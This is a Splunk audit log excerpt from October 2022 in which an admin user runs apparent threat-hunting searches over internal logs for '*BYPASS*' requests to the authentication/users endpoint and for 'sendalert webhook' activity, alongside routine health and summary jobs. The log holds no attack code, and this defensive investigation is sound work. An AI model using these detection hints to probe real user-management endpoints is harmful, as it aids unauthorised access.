fully_completed_search=true, total_run_time=0.02, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079303, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="20", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_4d71bd0a0cd064a7", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal *BYPASS*" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:03:05.171, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:03:05.107, user=admin, action=search, info=granted REST: /search/jobs/1665079384.40/events] Audit:[timestamp=10-06-2022 18:03:05.105, user=admin, action=search, info=granted REST: /search/jobs/1665079384.40/summary] Audit:[timestamp=10-06-2022 18:03:04.966, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:03:04.826, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:04.826, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:04.825, user=admin, action=search, info=granted REST: /search/jobs/1665079384.40] Audit:[timestamp=10-06-2022 18:03:04.690, user=admin, action=quota,search_id=1665079384.40, elapsed_ms=1, cache_size=6] Audit:[timestamp=10-06-2022 18:03:04.689, user=admin, action=search, info=granted , search_id='1665079384.40', search='search index=_internal uri=*/services/authentication/users* AND "sendalert" "webhook"', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 18:00:00 2022', apiEndTime='Thu Oct 6 18:03:04 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 18:03:04.689, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:03:04.682, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:03:04.530, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:04.530, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:04.530, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:03:04.530, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:02:59.817, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:02:54.825, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:02:54.770, user=admin, action=search, info=granted REST: /search/jobs/1665079374.39/events] Audit:[timestamp=10-06-2022 18:02:54.727, user=admin, action=search, info=granted REST: /search/jobs/1665079374.39/summary] Audit:[timestamp=10-06-2022 18:02:54.544, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:02:54.397, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:54.397, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:54.396, user=admin, action=search, info=granted REST: /search/jobs/1665079374.39] Audit:[timestamp=10-06-2022 18:02:54.256, user=admin, action=quota,search_id=1665079374.39, elapsed_ms=1, cache_size=5] Audit:[timestamp=10-06-2022 18:02:54.255, user=admin, action=search, info=granted , search_id='1665079374.39', search='search index=_internal uri=*/services/authentication/users* AND sendalert webhook', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 18:00:00 2022', apiEndTime='Thu Oct 6 18:02:54 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 18:02:54.254, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:02:54.246, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:02:54.082, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:54.082, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:54.082, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:02:54.082, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:02:52.705, user=admin, action=search, info=granted , search_id='ta_1665079372.38', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND sendalert we" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:02:52.405, user=admin, action=search, info=granted , search_id='ta_1665079372.37', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND sendalert w" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:02:49.814, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:02:47.523, user=admin, action=search, info=granted REST: /search/jobs/1665079336.31/control] Audit:[timestamp=10-06-2022 18:02:45.562, user=admin, action=search, info=granted , search_id='ta_1665079365.36', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND sen" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:02:45.191, user=admin, action=search, info=granted , search_id='ta_1665079365.35', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND s" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:02:41.638, user=admin, action=search, info=granted , search_id='ta_1665079361.34', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:02:41.408, user=admin, action=search, info=granted , search_id='ta_1665079361.33', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:02:41.183, user=admin, action=search, info=granted , search_id='ta_1665079361.32', search='typeahead prefix="index=_internal uri=*/services/authentication/users* A" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:02:39.810, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:02:36.307, user=admin, action=search, info=completed, search_id='1665079327.29', has_error_warn=false, fully_completed_search=true, total_run_time=0.16, event_count=0, result_count=0, available_count=0, scan_count=44, drop_count=0, exec_time=1665079327, api_et=1664992800.000000000, api_lt=1665079327.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664992800.000000000, search_lt=1665079327.000000000, is_realtime=0, savedsearch_name="", search_startup_time="131", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_3cab2d861629895f", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=2, eliminated_buckets=0, considered_events=44, total_slices=26, decompressed_slices=16, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=24, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='search index=_internal *BYPASS* uri=*/services/authentication/users*'] Audit:[timestamp=10-06-2022 18:02:36.306, user=admin, action=search, info=completed, search_id='1665079336.31', has_error_warn=false, fully_completed_search=true, total_run_time=0.16, event_count=31, result_count=31, available_count=31, scan_count=44, drop_count=0, exec_time=1665079336, api_et=1664992800.000000000, api_lt=1665079336.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664992800.000000000, search_lt=1665079336.000000000, is_realtime=0, savedsearch_name="", search_startup_time="126", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_f471673ec71004fc", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=2, eliminated_buckets=0, considered_events=44, total_slices=26, decompressed_slices=16, duration.command.search.index=1, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=23, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, sourcetype_count__splunkd_access=13, sourcetype_count__splunkd_ui_access=18, roles='admin+power+user', search='search index=_internal uri=*/services/authentication/users*'] Audit:[timestamp=10-06-2022 18:02:36.305, user=admin, action=search, info=bad_request, search_id='1665079334.30', has_error_warn=true, fully_completed_search=true, total_run_time=0.00, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079334, api_et=1664992800.000000000, api_lt=1665079334.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="0", is_prjob=false, app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='search index=_internaluri=*/services/authentication/users*'] Audit:[timestamp=10-06-2022 18:02:32.524, user=admin, action=search, info=granted REST: /search/jobs/1665079336.31/control] Audit:[timestamp=10-06-2022 18:02:29.812, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:02:19.816, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:02:17.545, user=admin, action=search, info=granted REST: /search/jobs/1665079336.31/timeline] Audit:[timestamp=10-06-2022 18:02:17.531, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:17.530, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:17.530, user=admin, action=search, info=granted REST: /search/jobs/1665079336.31/summary] Audit:[timestamp=10-06-2022 18:02:17.530, user=admin, action=search, info=granted REST: /search/jobs/1665079336.31] Audit:[timestamp=10-06-2022 18:02:17.440, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:02:17.380, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:17.380, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:17.379, user=admin, action=search, info=granted REST: /search/jobs/1665079336.31] Audit:[timestamp=10-06-2022 18:02:17.356, user=admin, action=search, info=granted REST: /search/jobs/1665079336.31/events] Audit:[timestamp=10-06-2022 18:02:17.314, user=admin, action=search, info=granted REST: /search/jobs/1665079336.31/summary] Audit:[timestamp=10-06-2022 18:02:17.177, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:02:17.018, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:17.018, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:17.017, user=admin, action=search, info=granted REST: /search/jobs/1665079336.31] Audit:[timestamp=10-06-2022 18:02:16.880, user=admin, action=quota,search_id=1665079336.31, elapsed_ms=1, cache_size=6] Audit:[timestamp=10-06-2022 18:02:16.879, user=admin, action=search, info=granted , search_id='1665079336.31', search='search index=_internal uri=*/services/authentication/users*', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 18:00:00 2022', apiEndTime='Thu Oct 6 18:02:16 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 18:02:16.878, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:02:16.873, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:02:16.713, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:16.713, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:16.713, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:02:16.713, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:02:15.280, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:02:15.226, user=admin, action=search, info=granted REST: /search/jobs/1665079334.30/events] Audit:[timestamp=10-06-2022 18:02:15.224, user=admin, action=search, info=granted REST: /search/jobs/1665079334.30/summary] Audit:[timestamp=10-06-2022 18:02:15.084, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:02:14.922, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:14.922, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:14.921, user=admin, action=search, info=granted REST: /search/jobs/1665079334.30] Audit:[timestamp=10-06-2022 18:02:14.738, user=admin, action=quota,search_id=1665079334.30, elapsed_ms=1, cache_size=5] Audit:[timestamp=10-06-2022 18:02:14.737, user=admin, action=search, info=granted , search_id='1665079334.30', search='search index=_internaluri=*/services/authentication/users*', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 18:00:00 2022', apiEndTime='Thu Oct 6 18:02:14 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 18:02:14.736, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:02:14.735, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:02:14.574, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:14.574, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:14.574, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:02:14.574, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:02:09.814, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:02:08.212, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:08.212, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:08.211, user=admin, action=search, info=granted REST: /search/jobs/1665079327.29] Audit:[timestamp=10-06-2022 18:02:08.206, user=admin, action=search, info=granted REST: /search/jobs/1665079327.29/events] Audit:[timestamp=10-06-2022 18:02:08.206, user=admin, action=search, info=granted REST: /search/jobs/1665079327.29/summary] Audit:[timestamp=10-06-2022 18:02:08.066, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:08.066, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:08.065, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:02:08.065, user=admin, action=search, info=granted REST: /search/jobs/1665079327.29] Audit:[timestamp=10-06-2022 18:02:07.935, user=admin, action=search, info=granted REST: /search/jobs/1665079327.29/events] Audit:[timestamp=10-06-2022 18:02:07.928, user=admin, action=search, info=granted REST: /search/jobs/1665079327.29/summary] Audit:[timestamp=10-06-2022 18:02:07.792, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:02:07.650, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:07.650, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:07.649, user=admin, action=search, info=granted REST: /search/jobs/1665079327.29] Audit:[timestamp=10-06-2022 18:02:07.500, user=admin, action=quota,search_id=1665079327.29, elapsed_ms=2, cache_size=4] Audit:[timestamp=10-06-2022 18:02:07.499, user=admin, action=search, info=granted , search_id='1665079327.29', search='search index=_internal *BYPASS* uri=*/services/authentication/users*', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 18:00:00 2022', apiEndTime='Thu Oct 6 18:02:07 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 18:02:07.498, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:02:07.357, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:02:07.205, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:07.205, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:02:07.205, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:02:07.205, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:02:06.307, user=splunk-system-user, action=search, info=completed, search_id='SummaryDirector_1665079296.26', has_error_warn=false, fully_completed_search=true, total_run_time=0.02, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079296, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="0", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_system_nobody_5e853401e6a3c521", app="system", provenance="summary_director", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+splunk-system-role+user', search='summarize maintain="%22SUMMARY_ID%22%2C%22EARLIEST_TIME%22%2C%22REMOTE_SEARCH%22%2C%22NORM_SUMMARY_ID%22%2C%22NORM_REMOTE_SEARCH%22%0A" summaryprefix="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF"'] Audit:[timestamp=10-06-2022 18:02:06.306, user=splunk-system-user, action=search, info=completed, search_id='SummaryDirector_1665079296.27', has_error_warn=false, fully_completed_search=true, total_run_time=0.02, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079296, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="0", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_system_nobody_529939c1a7868c10", app="system", provenance="summary_director", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+splunk-system-role+user', search='summarize tstats=t maintain="" summaryprefix="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF"'] Audit:[timestamp=10-06-2022 18:01:59.817, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:01:52.626, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25/control] Audit:[timestamp=10-06-2022 18:01:49.813, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:01:43.458, user=admin, action=search, info=granted , search_id='ta_1665079303.28', search='typeahead prefix="index=_internal *BYPASS*" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:01:39.810, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:01:37.624, user=admin, action=search, info=granted REST: /search/jobs/1665079222.25/control] Audit:[timestamp=10-06-2022 18:01:36.501, user=splunk-system-user, action=search, info=granted , search_id='SummaryDirector_1665079296.27', search='summarize tstats=t maintain="" summaryprefix="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF"', autojoin='1', buckets=0, ttl=30, max_count=10000, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="system", provenance="summary_director", mode="historical"] Audit:[timestamp=10-06-2022 18:01:36.499, user=splunk-system-user, action=search, info=granted , search_id='SummaryDirector_1665079296.26', search='summarize maintain="%22SUMMARY_ID%22%2C%22EARLIEST_TIME%22%2C%22REMOTE_SEARCH%22%2C%22NORM_SUMMARY_ID%22%2C%22NORM_REMOTE_SEARCH%22%0A" summaryprefix="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF"', autojoin='1', buckets=0, ttl=30, max_count=10000, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="system", provenance="summary_director", mode="historical"] Audit:[timestamp=10-06-2022 18:01:36.309, user=admin, action=search, info=canceled, search_id='ta_1665079218.20', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079218, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="9", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_497a2d0990bff81f", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal *BY" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:01:36.308, user=admin, action=search, info=canceled, search_id='ta_1665079219.24', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079219, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="14", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_911b4dd6cd708c82", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal *BYPASS" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:01:36.307, user=admin, action=search, info=canceled, search_id='ta_1665079219.23', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079219, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="9", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_554513034dc1ffef", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal *BYPAS" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:01:36.306, user=admin, action=search, info=canceled, search_id='ta_1665079219.22', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079219, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="9", 